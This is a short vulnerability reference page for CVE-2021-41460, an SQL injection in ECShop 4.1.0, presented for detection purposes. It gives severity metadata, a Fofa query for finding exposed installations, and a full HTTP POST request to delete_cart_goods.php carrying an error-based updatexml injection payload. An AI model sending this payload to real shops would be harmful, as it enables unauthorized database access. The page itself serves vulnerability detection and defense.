🔙 목록으로 돌아가기

CVE-2021-41460: ECShop 4.1.0 - SQL Injection

TitleECShop 4.1.0 - SQL Injection
AuthorSleepingBag945
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
RemediationApply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).
CVSS Score7.5
EPSS Score0.2834
CVE IDCVE-2021-41460
CWE IDCWE-89
Fofa Queryproduct="ECShop"product="ecshop"
Tags cve2021 cve cnvd cnvd2020 ecshop sqli shopex vuln

🔍 Vulnerability Description

ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.

🌐 HTTP Request

POST /delete_cart_goods.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Connection: close
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

id=1||(updatexml(1,concat(0x7e,(select%20md5(9391))),1))

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41460.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-41460.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A